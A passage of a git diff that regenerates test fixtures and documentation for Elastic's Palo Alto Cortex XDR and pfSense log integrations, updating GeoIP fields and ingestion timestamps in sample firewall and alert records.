 "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 443,
@@ -113,7 +108,7 @@ "event": { "severity": 4, "reason": "Info-Leak (7.7.7.7/cgi-bin/config.exp)", - "ingested": "2021-12-09T13:44:33.525006400Z", + "ingested": "2021-12-14T14:54:07.245432513Z", "original": "{\"external_id\":\"396239671\",\"severity\":\"high\",\"matching_status\":\"UNMATCHABLE\",\"end_match_attempt_ts\":null,\"local_insert_ts\":1626347122923,\"bioc_indicator\":null,\"matching_service_rule_id\":null,\"attempt_counter\":null,\"bioc_category_enum_key\":null,\"is_whitelisted\":false,\"starred\":false,\"deduplicate_tokens\":\"af4e477c1e284c3f9b1fff340fddb4d0,57f0d1f4096a45bdb4cd8d4b8a626f15\",\"filter_rule_id\":null,\"mitre_technique_id_and_name\":null,\"mitre_tactic_id_and_name\":null,\"agent_version\":null,\"agent_device_domain\":null,\"agent_fqdn\":null,\"agent_os_type\":\"NO_HOST\",\"agent_os_sub_type\":null,\"agent_data_collection_status\":null,\"mac\":\"4c:ae:a3:8e:c8:6a\",\"events\":{\"agent_install_type\":\"NA\",\"agent_host_boot_time\":null,\"event_sub_type\":null,\"module_id\":null,\"association_strength\":10,\"dst_association_strength\":10,\"story_id\":\"MzYzOTQ0MDE1MDI4OTE3NDUyNA==\",\"event_id\":\"MzYzOTQ0MDE1MDI4OTE3NDUyNA==\",\"event_type\":\"Network 
Connections\",\"event_timestamp\":1626346867000,\"actor_process_instance_id\":null,\"actor_process_image_path\":null,\"actor_process_image_name\":null,\"actor_process_command_line\":null,\"actor_process_signature_status\":\"N/A\",\"actor_process_signature_vendor\":null,\"actor_process_image_sha256\":null,\"actor_process_image_md5\":null,\"actor_process_causality_id\":null,\"actor_causality_id\":null,\"actor_process_os_pid\":null,\"actor_thread_thread_id\":null,\"causality_actor_process_image_name\":null,\"causality_actor_process_command_line\":null,\"causality_actor_process_image_path\":null,\"causality_actor_process_signature_vendor\":null,\"causality_actor_process_signature_status\":\"N/A\",\"causality_actor_causality_id\":null,\"causality_actor_process_execution_time\":null,\"causality_actor_process_image_md5\":null,\"causality_actor_process_image_sha256\":null,\"action_file_path\":null,\"action_file_name\":null,\"action_file_md5\":null,\"action_file_sha256\":null,\"action_file_macro_sha256\":null,\"action_registry_data\":null,\"action_registry_key_name\":null,\"action_registry_value_name\":null,\"action_registry_full_key\":null,\"action_local_ip\":\"10.10.10.10\",\"action_local_port\":58642,\"action_remote_ip\":\"175.16.199.1\",\"action_remote_port\":443,\"action_external_hostname\":\"175.16.199.1\",\"action_country\":\"DK\",\"action_process_instance_id\":null,\"action_process_causality_id\":null,\"action_process_image_name\":null,\"action_process_image_sha256\":null,\"action_process_image_command_line\":null,\"action_process_signature_status\":\"N/A\",\"action_process_signature_vendor\":null,\"os_actor_effective_username\":null,\"os_actor_process_instance_id\":null,\"os_actor_process_image_path\":null,\"os_actor_process_image_name\":null,\"os_actor_process_command_line\":null,\"os_actor_process_signature_status\":\"N/A\",\"os_actor_process_signature_vendor\":null,\"os_actor_process_image_sha256\":null,\"os_actor_process_causality_id\":null,\"os_actor_causality_
id\":null,\"os_actor_process_os_pid\":null,\"os_actor_thread_thread_id\":null,\"fw_app_id\":\"web-browsing\",\"fw_interface_from\":\"INTERNET\",\"fw_interface_to\":\"INTERNET\",\"fw_rule\":\"INTERNET_INTERNET_GlobalProtect-443\",\"fw_rule_id\":null,\"fw_device_name\":\"FW-DEVICE_NAME\",\"fw_serial_number\":\"12352345\",\"fw_url_domain\":\"9.9.9.9\",\"fw_email_subject\":null,\"fw_email_sender\":null,\"fw_email_recipient\":null,\"fw_app_subcategory\":\"internet-utility\",\"fw_app_category\":\"general-internet\",\"fw_app_technology\":\"browser-based\",\"fw_vsys\":\"vsys1\",\"fw_xff\":null,\"fw_misc\":\"7.7.7.7/cgi-bin/config.exp\",\"fw_is_phishing\":\"No\",\"dst_agent_id\":\"6.6.6.6\",\"dst_causality_actor_process_execution_time\":null,\"dns_query_name\":null,\"dst_action_external_hostname\":null,\"dst_action_country\":\"US\",\"dst_action_external_port\":null,\"contains_featured_host\":\"NO\",\"contains_featured_user\":\"NO\",\"contains_featured_ip\":\"NO\",\"image_name\":null,\"container_id\":null,\"cluster_name\":null,\"user_name\":null},\"alert_id\":\"2879211\",\"detection_timestamp\":1626346849000,\"name\":\"Cisco RV320/RV325 Router Unauthenticated Configuration Export Vulnerability\",\"category\":\"Vulnerability\",\"endpoint_id\":\"192.168.2.2\",\"description\":\"Info-Leak (7.7.7.7/cgi-bin/config.exp)\",\"host_ip\":[\"192.168.2.2\"],\"host_name\":null,\"mac_addresses\":[\"ab:ae:f5:sd:c8:6a\"],\"source\":\"PAN NGFW\",\"action\":\"BLOCKED_9\",\"action_pretty\":\"Prevented (Terminated The Session And Sent a TCP Reset To Both Sides Of The Connection)\"}", "kind": "alert", "created": "2021-07-15T11:00:49.000Z", 
@@ -203,7 +198,7 @@ "event": { "severity": 3, "reason": "Suspicious executable detected", - "ingested": "2021-12-09T13:44:33.525009700Z", + "ingested": "2021-12-14T14:54:07.245434405Z", "original": "{\"external_id\":\"803fd786a6ba49c1bb642e3ba91a93c7\",\"severity\":\"medium\",\"matching_status\":\"MATCHED\",\"end_match_attempt_ts\":1582275027631,\"local_insert_ts\":1582274996871,\"bioc_indicator\":null,\"matching_service_rule_id\":null,\"attempt_counter\":1,\"bioc_category_enum_key\":null,\"is_whitelisted\":false,\"starred\":false,\"deduplicate_tokens\":null,\"filter_rule_id\":null,\"mitre_technique_id_and_name\":null,\"mitre_tactic_id_and_name\":null,\"agent_version\":null,\"agent_device_domain\":null,\"agent_fqdn\":null,\"agent_os_type\":\"Windows\",\"agent_os_sub_type\":null,\"agent_data_collection_status\":true,\"mac\":null,\"events\":{\"agent_install_type\":\"STANDARD\",\"agent_host_boot_time\":null,\"event_sub_type\":null,\"module_id\":null,\"association_strength\":null,\"dst_association_strength\":null,\"story_id\":null,\"event_id\":null,\"event_type\":\"Process Execution\",\"event_timestamp\":1582274179588,\"actor_process_instance_id\":\"AdXokfzvxXMAAEB8AAAAAA==\",\"actor_process_image_path\":\"C:\\\\Users\\\\testuser\\\\Desktop\\\\unlocker-master\\\\gettools.exe\",\"actor_process_image_name\":\"gettools.exe\",\"actor_process_command_line\":\"gettools.exe\",\"actor_process_signature_status\":\"Unsigned\",\"actor_process_signature_vendor\":\"N/A\",\"actor_process_image_sha256\":\"4FEAF3340B663CCE76EE09D7621E43C8A0A4C89C1DE4734E2EF2C903C29C366F\",\"actor_process_image_md5\":null,\"actor_process_causality_id\":\"AdXokeompQUAAECsAAAAAA==\",\"actor_causality_id\":null,\"actor_process_os_pid\":16508,\"actor_thread_thread_id\":null,\"causality_actor_process_image_name\":\"cmd.exe\",\"causality_actor_process_command_line\":\"\\\"C:\\\\WINDOWS\\\\System32\\\\cmd.exe\\\" /C \\\"C:\\\\Users\\\\testuser\\\\Desktop\\\\unlocker-master\\\\win-install.cmd\\\" 
\",\"causality_actor_process_image_path\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"causality_actor_process_signature_vendor\":\"Microsoft Corporation\",\"causality_actor_process_signature_status\":\"Signed\",\"causality_actor_causality_id\":\"AdXokeompQUAAECsAAAAAA==\",\"causality_actor_process_execution_time\":1582274147424,\"causality_actor_process_image_md5\":null,\"causality_actor_process_image_sha256\":\"9a7c58bd98d70631aa1473f7b57b426db367d72429a5455b433a05ee251f3236\",\"action_file_path\":null,\"action_file_name\":null,\"action_file_md5\":null,\"action_file_sha256\":null,\"action_file_macro_sha256\":null,\"action_registry_data\":null,\"action_registry_key_name\":null,\"action_registry_value_name\":null,\"action_registry_full_key\":null,\"action_local_ip\":null,\"action_local_port\":null,\"action_remote_ip\":null,\"action_remote_port\":null,\"action_external_hostname\":null,\"action_country\":null,\"action_process_instance_id\":null,\"action_process_causality_id\":null,\"action_process_image_name\":null,\"action_process_image_sha256\":null,\"action_process_image_command_line\":null,\"action_process_signature_status\":\"N/A\",\"action_process_signature_vendor\":\"N/A\",\"os_actor_effective_username\":null,\"os_actor_process_instance_id\":null,\"os_actor_process_image_path\":null,\"os_actor_process_image_name\":null,\"os_actor_process_command_line\":null,\"os_actor_process_signature_status\":null,\"os_actor_process_signature_vendor\":null,\"os_actor_process_image_sha256\":null,\"os_actor_process_causality_id\":null,\"os_actor_causality_id\":null,\"os_actor_process_os_pid\":null,\"os_actor_thread_thread_id\":null,\"fw_app_id\":null,\"fw_interface_from\":null,\"fw_interface_to\":null,\"fw_rule\":null,\"fw_rule_id\":null,\"fw_device_name\":null,\"fw_serial_number\":null,\"fw_url_domain\":null,\"fw_email_subject\":null,\"fw_email_sender\":null,\"fw_email_recipient\":null,\"fw_app_subcategory\":null,\"fw_app_category\":null,\"fw_app_technology\":null,\"fw_vsys\":nu
ll,\"fw_xff\":null,\"fw_misc\":null,\"fw_is_phishing\":\"N/A\",\"dst_agent_id\":null,\"dst_causality_actor_process_execution_time\":null,\"dns_query_name\":null,\"dst_action_external_hostname\":null,\"dst_action_country\":null,\"dst_action_external_port\":null,\"contains_featured_host\":null,\"contains_featured_user\":null,\"contains_featured_ip\":null,\"image_name\":null,\"container_id\":null,\"cluster_name\":null,\"user_name\":null},\"alert_id\":\"389045\",\"detection_timestamp\":1582274179588,\"name\":\"WildFire Malware\",\"category\":\"Malware\",\"endpoint_id\":\"7e2caa3cfcba492ec3b7468356699991\",\"description\":\"Suspicious executable detected\",\"host_ip\":[\"192.168.2.2\"],\"host_name\":\"test-hostname\",\"mac_addresses\":null,\"source\":\"XDR Agent\",\"action\":\"BLOCKED\",\"action_pretty\":\"Prevented (Blocked)\"}", "kind": "alert", "created": "2020-02-21T08:36:19.588Z",
diff --git a/packages/panw_cortex_xdr/data_stream/alerts/fields/ecs.yml b/packages/panw_cortex_xdr/data_stream/alerts/fields/ecs.yml
index 1fc7ce8e8ec..a722e029bfb 100644
--- a/packages/panw_cortex_xdr/data_stream/alerts/fields/ecs.yml
+++ b/packages/panw_cortex_xdr/data_stream/alerts/fields/ecs.yml
@@ -46,6 +46,8 @@
 external: ecs
 - name: destination.geo.continent_name
 external: ecs
+- name: destination.geo.city_name
+ external: ecs
 - name: destination.geo.country_iso_code
 external: ecs
 - name: destination.geo.country_name
diff --git a/packages/panw_cortex_xdr/docs/README.md b/packages/panw_cortex_xdr/docs/README.md
index a2ec3ad0721..d2a2e55b209 100644
--- a/packages/panw_cortex_xdr/docs/README.md
+++ b/packages/panw_cortex_xdr/docs/README.md
@@ -34,6 +34,7 @@ https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-api/cortex-xdr-ap
 | data_stream.type | Data stream type. | constant_keyword |
 | destination.as.number | Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. | long |
 | destination.as.organization.name | Organization name. | keyword |
+| destination.geo.city_name | City name. | keyword |
 | destination.geo.continent_name | Name of the continent. | keyword |
 | destination.geo.country_iso_code | Country ISO code. | keyword |
 | destination.geo.country_name | Country name. | keyword |
@@ -65,7 +66,7 @@ https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-api/cortex-xdr-ap
 | host.hostname | Hostname of the host. It normally contains what the `hostname` command returns on the host machine. | keyword |
 | host.id | Unique host id. As hostname is not always unique, use values that are meaningful in your environment. Example: The current usage of `beat.name`. | keyword |
 | host.ip | Host ip addresses. | ip |
-| host.mac | Host MAC addresses. The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. | keyword |
+| host.mac | Host mac addresses. | keyword |
 | host.name | Name of the host. It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use. | keyword |
 | host.os.build | OS build information. | keyword |
 | host.os.codename | OS codename, if any. | keyword |
diff --git a/packages/panw_cortex_xdr/manifest.yml b/packages/panw_cortex_xdr/manifest.yml
index 8a75814550d..45ab7df118e 100644
--- a/packages/panw_cortex_xdr/manifest.yml
+++ b/packages/panw_cortex_xdr/manifest.yml
@@ -1,6 +1,6 @@
 name: panw_cortex_xdr
 title: Palo Alto Cortex XDR Logs
-version: 0.2.5
+version: 0.2.6
 release: beta
 description: Collect and parse logs from Palo Alto Cortex XDR API with Elastic Agent.
 type: integration
diff --git a/packages/pfsense/changelog.yml b/packages/pfsense/changelog.yml
index 93c51438ae6..a1d1377021e 100644
--- a/packages/pfsense/changelog.yml
+++ b/packages/pfsense/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "0.2.2"
+ changes:
+ - description: Regenerate test files using the new GeoIP database
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/2339
 - version: "0.2.1"
 changes:
 - description: Change test public IPs to the supported subset
diff --git a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-bsd.log-expected.json b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-bsd.log-expected.json
index 553f5b780cd..23c21e44d7a 100644
--- a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-bsd.log-expected.json
+++ b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-bsd.log-expected.json
@@ -9,19 +9,14 @@
 "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1",
@@ -91,7 +86,7 @@
 }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:35.709404500Z", + "ingested": "2021-12-14T14:54:09.821721765Z", "original": "\u003c134\u003eJul 3 19:10:30 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,12617,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49724,853,0,S,1891286705,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00",
@@ -116,19 +111,14 @@
 "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1",
@@ -198,7 +188,7 @@
 }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:35.709412800Z", + "ingested": "2021-12-14T14:54:09.821724115Z", "original": "\u003c134\u003eJul 3 19:10:30 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,32554,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49696,853,0,S,3995901112,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00",
@@ -223,19 +213,14 @@
 "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1",
@@ -296,7 +281,7 @@
 }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:35.709421500Z", + "ingested": "2021-12-14T14:54:09.821726590Z", "original": "\u003c134\u003eJul 3 19:10:30 filterlog[72237]: 176,,,1520797901,igb1.27,match,pass,in,4,0xb8,,64,58355,0,none,17,udp,76,10.170.27.27,175.16.199.1,123,123,56", "provider": "filterlog", "timezone": "-04:00",
@@ -321,19 +306,14 @@
 "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1",
@@ -403,7 +383,7 @@
 }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:35.709427600Z", + "ingested": "2021-12-14T14:54:09.821727007Z", "original": "\u003c134\u003eJul 3 19:10:31 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,47260,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49726,853,0,S,2457553480,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00",
@@ -428,19 +408,14 @@
 "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1",
@@ -510,7 +485,7 @@
 }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:35.709435300Z", + "ingested": "2021-12-14T14:54:09.821727419Z", "original": "\u003c134\u003eJul 3 19:10:31 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,23391,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,56584,853,0,S,1118373581,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00",
@@ -535,19 +510,14 @@
 "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1",
@@ -617,7 +587,7 @@
 }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:35.709444Z", + "ingested": "2021-12-14T14:54:09.821727876Z", "original": "\u003c134\u003eJul 3 19:10:31 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,547,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,56542,853,0,S,3798927693,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00",
@@ -696,7 +666,7 @@
 }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:35.709450700Z", + "ingested": "2021-12-14T14:54:09.821728254Z", "original": "\u003c134\u003eJul 3 19:10:31 filterlog[72237]: 6,,,1000000105,igb1.27,match,block,in,6,0x00,0xf6279,1,UDP,17,32,fe80::208:9bff:fef3:652b,ff02::1:2,546,547,32", "provider": "filterlog", "timezone": "-04:00",
@@ -721,19 +691,14 @@
 "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1",
@@ -803,7 +768,7 @@
 }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:35.709457100Z", + "ingested": "2021-12-14T14:54:09.821728656Z", "original": "\u003c134\u003eJul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,47261,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49726,853,0,S,2457553480,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00",
@@ -828,19 +793,14 @@
 "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1",
@@ -910,7 +870,7 @@
 }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:35.709463800Z", + "ingested": "2021-12-14T14:54:09.821729041Z", "original": "\u003c134\u003eJul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,1896,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49708,853,0,S,1224947595,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00",
@@ -935,19 +895,14 @@
 "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1",
@@ -1017,7 +972,7 @@
 }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:35.709469200Z", + "ingested": "2021-12-14T14:54:09.821729437Z", "original": "\u003c134\u003eJul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,40620,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,56578,853,0,S,3864182524,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00",
@@ -1042,19 +997,14 @@
 "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1",
@@ -1124,7 +1074,7 @@
 }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:35.709476400Z", + "ingested": "2021-12-14T14:54:09.821729829Z", "original": "\u003c134\u003eJul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,25977,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49728,853,0,S,796254558,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00",
@@ -1149,19 +1099,14 @@
 "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1",
@@ -1231,7 +1176,7 @@
 }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:35.709486200Z", + "ingested": "2021-12-14T14:54:09.821730422Z", "original": "\u003c134\u003eJul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,12618,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49724,853,0,S,1891286705,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00",
@@ -1256,19 +1201,14 @@
 "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1",
@@ -1338,7 +1278,7 @@
 }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:35.709495100Z", + "ingested": "2021-12-14T14:54:09.821730829Z", "original": "\u003c134\u003eJul 3 19:10:33 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,11515,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49710,853,0,S,3494229132,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00",
@@ -1363,19 +1303,14 @@
 "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1",
@@ -1445,7 +1380,7 @@
 }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:35.709502700Z", + "ingested": "2021-12-14T14:54:09.821731232Z", "original": "\u003c134\u003eJul 3 19:10:33 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,48979,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49672,853,0,S,1436983722,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00",
@@ -1526,7 +1461,7 @@
 }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:35.709509100Z", + "ingested": "2021-12-14T14:54:09.821731613Z", "original": "\u003c134\u003eJul 3 19:10:33 filterlog[72237]: 176,,,1520797901,igb1.27,match,pass,in,4,0x0,,64,29691,0,DF,17,udp,78,10.170.27.41,10.170.27.255,137,137,58", "provider": "filterlog", "timezone": "-04:00",
@@ -1551,19 +1486,14 @@
 "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1",
@@ -1633,7 +1563,7 @@
 }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:35.709515400Z", + "ingested": "2021-12-14T14:54:09.821731992Z", "original": "\u003c134\u003eJul 3 19:10:33 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,25978,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49728,853,0,S,796254558,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00",
@@ -1658,19 +1588,14 @@
 "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1",
@@ -1727,7 +1652,7 @@
 }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:35.709521900Z", + "ingested": "2021-12-14T14:54:09.821732481Z", "original": "\u003c134\u003eJul 3 19:10:33 filterlog[72237]: 199,,,1557957510,igb1.12,match,pass,in,4,0xc0,,1,0,0,DF,2,igmp,32,10.170.12.17,175.16.199.1,datalength=8", "provider": "filterlog", "timezone": "-04:00",
@@ -1752,19 +1677,14 @@
 "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1",
@@ -1825,7 +1745,7 @@
 }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:35.709528Z", + "ingested": "2021-12-14T14:54:09.821732867Z", "original": "\u003c134\u003eJul 4 11:10:45 filterlog[72237]: 176,,,1520797901,igb1.10,match,pass,in,4,0x0,,64,62096,0,DF,1,icmp,84,10.100.10.30,175.16.199.1,request,37728,164", "provider": "filterlog", "timezone": "-04:00",
@@ -1906,7 +1826,7 @@
 }, "event": { "reason": "match", - "ingested": "2021-12-09T13:44:35.709534300Z", + "ingested": "2021-12-14T14:54:09.821733253Z", "original": "\u003c134\u003eJul 4 11:10:54 filterlog[72237]: 199,,,1557957510,igb1.15,match,pass,in,4,0x0,,64,0,0,DF,1,icmp,84,10.100.15.13,10.100.15.1,request,0,064", "provider": "filterlog", "timezone": "-04:00",
diff --git a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-dhcp.log-expected.json b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-dhcp.log-expected.json
index d1a5388bef7..02f2b2c8f35 100644
